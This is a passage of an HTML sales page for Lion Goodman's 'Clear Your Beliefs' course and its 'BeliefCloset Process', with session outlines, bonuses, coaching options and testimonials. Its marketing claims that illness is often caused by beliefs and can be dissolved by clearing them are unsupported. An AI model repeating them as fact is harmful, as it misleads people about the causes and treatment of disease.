permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\n\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<div style="text-align: right;"></div>\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\n\n</div>\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\n\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\n\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\n\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\n\n&nbsp;\n<div class="cb">\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\n<div class="module_body"></div>\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\n<div class="module_body"></div>\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\n</div>\n<!-- b2 -->\n\n<!--[wpfcNOT]-->\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\n<div class="module_body"></div>\n</div>\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\n\n</div>\n<div class="module_body">\n\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\n\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\n\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\n\n</div>\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D.\n\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<div class="cb">\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\n\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\n\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\n\n&nbsp;\n<div class="icon_box">\n<h1>Register Today And You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\n\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\n<ul>\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\n</ul>\n&nbsp;\n\n</div>\n&nbsp;\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\n\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\n\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\n\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\n\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\n\n&nbsp;\n<div class="cb">\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n<div class="icon_box">\n<div class="quot">\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right;margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset 